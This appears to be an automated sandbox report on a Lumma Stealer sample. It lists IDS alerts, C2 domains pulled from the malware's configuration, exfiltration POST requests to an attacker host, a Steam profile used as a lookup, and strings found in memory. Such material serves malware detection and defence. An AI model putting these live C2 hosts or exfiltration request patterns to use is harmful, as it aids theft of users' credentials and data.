Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00836BA7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0082AB67
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_0081AC99
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0083ECC9
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then test esi, esi	0_2_0084CC07
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then jmp eax	0_2_00851C3E
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0082BD88
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0082AD91
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0083EDC6
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ebx, eax	0_2_00815D17
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ebp, eax	0_2_00815D17
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_00826D15
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	0_2_00835D57
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0083BD67
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	0_2_0083BE07
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0083EE08
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ecx, eax	0_2_00850E12
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0083EE1A
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	0_2_0082BE2C
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then mov ebx, edx	0_2_0083DE57
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	0_2_00852F87

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.4:64183 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.4:61422 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.4:49771 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.4:59369 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.4:59603 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.4:65127 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.4:49715 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.4:55486 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.4:64312 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 104.21.48.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: apporholis.shop
Source: Malware configuration extractor	URLs: skidjazzyric.click
Source: Malware configuration extractor	URLs: handscreamny.shop
Source: Malware configuration extractor	URLs: chipdonkeruz.shop
Source: Malware configuration extractor	URLs: crowdwarek.shop
Source: Malware configuration extractor	URLs: versersleep.shop
Source: Malware configuration extractor	URLs: robinsharez.shop
Source: Malware configuration extractor	URLs: soundtappysk.shop
Source: Malware configuration extractor	URLs: femalsabler.shop

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.48.1:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GKMGCZTT9005User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18122Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QQ18IF45HAOU0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8749Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TXZ6P88ZYK8L5BSO92User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: sputnik-1985.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: skidjazzyric.click
Source: global traffic	DNS traffic detected: DNS query: soundtappysk.shop
Source: global traffic	DNS traffic detected: DNS query: femalsabler.shop
Source: global traffic	DNS traffic detected: DNS query: apporholis.shop
Source: global traffic	DNS traffic detected: DNS query: crowdwarek.shop
Source: global traffic	DNS traffic detected: DNS query: versersleep.shop
Source: global traffic	DNS traffic detected: DNS query: chipdonkeruz.shop
Source: global traffic	DNS traffic detected: DNS query: handscreamny.shop
Source: global traffic	DNS traffic detected: DNS query: robinsharez.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sputnik-1985.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com

Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000002.1929908575.0000000000502000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.s
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steamp
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampow
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=JWHwHdDIz5WW&l=e
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.st
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampU
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
